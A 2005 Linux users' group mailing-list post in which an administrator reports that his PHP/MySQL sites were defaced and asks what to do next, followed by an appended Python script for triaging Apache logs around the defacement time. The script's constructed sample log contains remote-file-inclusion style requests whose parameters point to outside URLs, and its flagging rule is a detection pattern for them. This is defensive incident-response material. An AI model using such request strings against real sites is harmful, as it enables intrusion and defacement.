David Kaplowitz on 17 Jan 2005 05:45:45 -0000
Well, I noticed tonight that one of my web sites got defaced. I was rather chagrined, as this is the first time I've been hacked after running public services for over 2 years. Upon closer inspection I noticed that every virtual host's index.html in my httpd.conf (about 8-9 sites) had been replaced by a lame index page by some Albanian political script kiddies. Although I've yet to find the smoking gun in my log files, I'm 99% positive they exploited weaknesses in my configuration (or lack thereof) of PHP/MySQL (and a few popular CMSes, TikiWiki and WordPress).

I'd noticed some problems a couple of weeks ago with my MySQL when I received a spam attack on my WordPress blog; when I tried logging into the DB, I wasn't able to authenticate and assumed there was a configuration issue. Unfortunately I kept procrastinating on looking further into it, which may have been my demise. So much for slacking on fixing problems.

I'm running Apache 1.3.29 on OpenBSD 3.6-STABLE (note 1.3.29 is OpenBSD's security-patched Apache; they actually don't recommend using 1.3.33 from apache.org, for both licensing and security reasons), PHP 4.3.8 and MySQL 4.0.20, all in a chroot'ed environment. I've run chkrootkit on the box and nothing comes up, and none of the authlog/secure logs look odd. The modded index.htmls are dated with yesterday's date. My Apache logs weren't revealing much that was readily apparent, but I did notice a lot of odd stuff related to what appeared to be scripts trying undeclared variables against the server. I've yet to look into it deeper.

I've disabled all public services on the box, and I'm presently tarring up all the partitions and am going to reinstall; this time I'm not going to even install PHP or MySQL until I can get to the bottom of the exploit. I'd feel confident running a base Apache on OpenBSD again. Anyway, can any of you recommend any further actions to take on this first invasion? I'm sure I missed some things.

But I'm pretty convinced that it's very unwise to be lazy when you're running the PHP/MySQL combo on a public server, esp. with some of these CMSes that are popular. Thanks in advance for any input. And sorry it's not

___________________________________________________________________________
Philadelphia Linux Users Group -- http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug
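One way to start the log triage the post describes, correlating Apache access-log activity with the modification time of the replaced index.html files and flagging requests whose query-string values are themselves full URLs, as an added example that is not part of the original post or any reply. The log lines, client addresses, paths and the defacement timestamp are constructed for illustration; the single "parameter value is a remote URL" signature is an assumption about what the "scripts trying undeclared variables" looked like in the PHP 4 register_globals era, not something the post states, and a real investigation would add its own signatures.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client ident user [timestamp] "request" status bytes "referer" "agent".
# Only the leading fields are captured; referer and user agent are ignored here.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not from the poster's server). The last line is deliberately
# unparseable to show that malformed lines are skipped rather than guessed at.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jan/2005:02:13:55 -0500] "GET /index.html HTTP/1.1" 200 1432 "-" "Mozilla/4.0"
203.0.113.7 - - [16/Jan/2005:02:14:02 -0500] "GET /cms/show.php?inc=http://198.51.100.9/x.txt HTTP/1.1" 200 982 "-" "Mozilla/4.0"
192.0.2.44 - - [16/Jan/2005:02:20:11 -0500] "GET /cms/show.php?inc=about HTTP/1.1" 200 5511 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Jan/2005:02:21:30 -0500] "POST /cms/comment.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.23 - - [13/Jan/2005:09:00:00 -0500] "GET /cms/show.php?inc=http://203.0.113.200/y.txt HTTP/1.1" 200 220 "-" "curl/7.10"
203.0.113.7 - - [16/Jan/2005:04:00:00 -0500] "GET /index.html HTTP/1.1" 200 210 "-" "Mozilla/4.0"
this line is not a log record
"""

# Constructed: mtime of the defaced index.html files (the post says "yesterday's date").
DEFACED_AT = datetime(2005, 1, 16, 3, 0, 0, tzinfo=timezone(timedelta(hours=-5)))


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def parse_log(text):
    """Parse every line of a log; unparseable lines are dropped."""
    return [r for r in (parse_line(line) for line in text.splitlines()) if r]


def param_carries_url(target):
    """True if any query-string value is a full URL, i.e. a request trying to make a
    script fetch content from somewhere else rather than a local page name."""
    query = urlsplit(target).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            return True
    return False


def triage(entries, mtime, before=timedelta(hours=48)):
    """Restrict to the window ending at the defacement mtime, then return
    (flagged requests, request count per client) for that window."""
    window = [e for e in entries if mtime - before <= e["when"] <= mtime]
    flagged = [e for e in window if param_carries_url(e["target"])]
    per_client = Counter(e["client"] for e in window)
    return flagged, per_client


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    flagged, per_client = triage(entries, DEFACED_AT)
    print(f"{len(entries)} records parsed, {len(flagged)} flagged in the 48h before {DEFACED_AT}")
    for e in flagged:
        print("  FLAG", e["when"].isoformat(), e["client"], e["method"], e["target"], e["status"])
    print("requests per client in window:")
    for client, n in per_client.most_common():
        print(f"  {client:16} {n}")
```

The window is anchored on the file mtime because that is the one hard fact the post has; a client that appears both in the flagged list and near the top of the per-client count is where to read the raw log next. Widen `before` if the mtime turns out to be later than the actual compromise, and run the same pass over each virtual host's separate log if they are not combined.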